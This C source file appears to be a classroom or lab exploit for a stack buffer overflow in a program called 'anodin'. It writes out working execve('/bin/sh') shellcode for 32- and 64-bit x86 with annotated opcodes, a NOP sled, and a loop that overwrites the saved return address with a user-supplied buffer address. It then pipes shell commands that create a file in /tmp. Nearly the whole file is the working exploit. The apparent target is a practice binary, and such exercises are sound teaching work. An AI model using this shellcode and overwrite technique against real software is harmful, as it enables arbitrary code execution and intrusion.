#include <stdlib.h>
#include <stdio.h>


unsigned char exploit[1024] = {
	0x90, 0x90, 0x90, 0x90,		// A few nops for some margin
	0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90,

#ifdef __x86_64__
	/* 64 bit version */
	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
	'/','b','i','n','/','s','h','\0',
	0x5f,				// pop the address
	0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00,	// execve system call
	0x6a, 0x00,			// push NULL at the end of the array
	0x48, 0x89, 0xe2,		// envp
	0x57,				// push adress
	0x48, 0x89, 0xe6,		// argv
	0x0f, 0x05,			// system call!
#else
	/* 32 bit version */
	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
	'/','b','i','n','/','s','h','\0',
	0x5b,				// pop the adress
	0xb8, 0x0b, 0x00, 0x00, 0x00,	// execve system call
	0x6a, 0x00,			// push NULL at the end of the array
	0x89, 0xe2,			// envp
	0x53,				// push adress
	0x89, 0xe1,			// argv
	0xcd, 0x80,			// system call!
#endif
};

int main(void) {
	int i;
	void **exploit_ptr = (void*) &exploit;
	void *ptr;

	fprintf(stderr,"Type the buf address printed by anodin\n");
	scanf("%p", &ptr);

	// Un peu de marge
	ptr += 8;

	// écraser l'adresse de retour
	for (i = 0; i < 8; i++)
		exploit_ptr[64/sizeof(void*)+i] = ptr;

	for (i=0;i<sizeof(exploit);i++)
		putchar(exploit[i]);

	for (i=0;i<8192;i++)
		putchar('\n');

	printf("touch /tmp/ahah\n");
	printf("echo \"I created file\" /tmp/ahah \\!\n");
	fflush(stdout);

	return 0;
}